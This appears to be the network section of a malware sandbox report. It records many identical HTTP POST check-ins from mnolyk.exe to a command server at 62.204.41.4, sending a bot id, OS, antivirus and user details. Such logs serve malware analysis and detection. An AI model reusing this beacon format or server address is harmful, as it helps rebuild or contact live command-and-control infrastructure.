Feb 7, 2023 20:01:18.077794075 CET	229	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:18.141810894 CET	229	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.2.6	49824	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:18.327899933 CET	230	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:18.389848948 CET	230	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.2.6	49825	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:18.559731960 CET	231	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:18.625855923 CET	231	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.2.6	49826	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:18.795279980 CET	232	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:18.859751940 CET	232	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.2.6	49827	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:19.034168005 CET	233	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:19.099330902 CET	233	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.2.6	49828	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:19.281462908 CET	234	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:19.346347094 CET	234	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.2.6	49829	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:19.514062881 CET	234	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:19.576844931 CET	235	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.2.6	49830	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:19.753947020 CET	236	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:19.816864014 CET	236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49729	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:53.543428898 CET	116	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:53.607263088 CET	116	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.2.6	49831	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:19.998059988 CET	237	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:20.060909033 CET	237	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.2.6	49832	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:20.240758896 CET	238	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:20.305460930 CET	238	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.2.6	49833	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:20.483012915 CET	239	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:20.547585011 CET	239	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.2.6	49834	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:20.722457886 CET	240	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:20.785341024 CET	240	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.2.6	49835	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:20.965850115 CET	241	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:21.028662920 CET	241	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.2.6	49836	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:21.202537060 CET	242	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:21.268675089 CET	242	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.2.6	49837	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:21.459259987 CET	243	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:21.520694971 CET	243	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.2.6	49838	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:21.703798056 CET	244	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:21.767724037 CET	244	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.2.6	49839	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:21.949196100 CET	245	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:22.013309002 CET	245	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	192.168.2.6	49840	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:22.187784910 CET	246	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:22.253473997 CET	246	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.6	49730	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:53.793502092 CET	117	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:53.858115911 CET	117	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	192.168.2.6	49841	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:22.423645973 CET	247	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:22.488256931 CET	247	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.2.6	49842	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:22.668684959 CET	248	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
